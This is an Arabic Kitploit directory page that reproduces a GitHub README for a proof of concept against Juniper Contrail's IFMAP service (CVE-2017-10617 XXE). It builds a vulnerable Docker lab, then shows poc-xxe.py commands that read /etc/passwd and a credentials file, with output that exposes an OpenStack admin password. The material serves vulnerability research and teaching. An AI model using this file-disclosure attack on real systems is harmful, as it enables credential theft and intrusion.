Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-10617 — استغلال إثبات المفهوم لثغرة Juniper Contrail XXE (CVE-2017-10617) مع بيئة مختبرية قائمة على Docker توضح كشف الملفات المحلية واستخراج بيانات الاعتماد. | Kitploit
أدوات/GitHubGitHub/gteissier/cve-2017-10617
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأمن السحابةالتعلم والتعليم
GitHubgteissier/cve-2017-10617

CVE-2017-10617

استغلال إثبات المفهوم لثغرة Juniper Contrail XXE (CVE-2017-10617) مع بيئة مختبرية قائمة على Docker توضح كشف الملفات المحلية واستخراج بيانات الاعتماد.

عرض المستودع
521منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-10616 & CVE-2017-10617

هاتان الثغرتان تؤثران على Juniper Contrail الإصدارات 2.2 و3.0 و3.1 و3.2:

  • بيانات اعتماد مضمّنة (CVE-2017-10616)
  • كيان خارجي XML (CVE-2017-10617)

يمكن العثور على النشرة الأمنية الخاصة بالبائع في تنبيه Juniper الأمني JSA10819 2017-10.

الخدمة المعرّضة للخطر في منتج Contrail هي برنامج خفي IFMAP، وهو مُجمَّع من irond. لتبسيط الأمور، دعنا نتابع مع irond واستغلال ثغرة XXE.

صورة Docker المعرّضة للخطر الخاصة بـ irond

نحن جميعًا نحب اللعب. لبناء الصورة:

root@kitploit:~
$ cd vulnerable-irond
$ docker build -t vulnerable-irond .

الصورة مبنية على صورة maven alpine، مع استنساخ لمستودع irond.

يتم وضع ملف اختبار يطابق إعداد Contrail على الصورة المعرّضة للخطر في /etc/contrail/openstackrc. يحتوي هذا الملف على كلمة مرور مدير OpenStack، وهو أصل حساس إلى حد ما.

لبدء خدمة IFMAP معرّضة للخطر:

root@kitploit:~
$ docker run -ti --rm -p 8443:8443 vulnerable-irond

خدمة IFMAP متاحة الآن على المنفذ 8443 على الجهاز المحلي.

إثبات المفهوم: كشف الملفات المحلية

بمجرد إعداد خدمة IFMAP معرّضة للخطر، قم بما يلي:

root@kitploit:~
$ ./poc-xxe.py -g /etc/passwd
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
...
$ ./poc-xxe.py -g /etc/contrail/openstackrc
export OS_USERNAME=admin
export OS_PASSWORD=6b000a589c700b077ef9729513e5d6fc
...

هذا يكشف فعليًا عن كلمة مرور مدير OpenStack.

تنزيل الأداة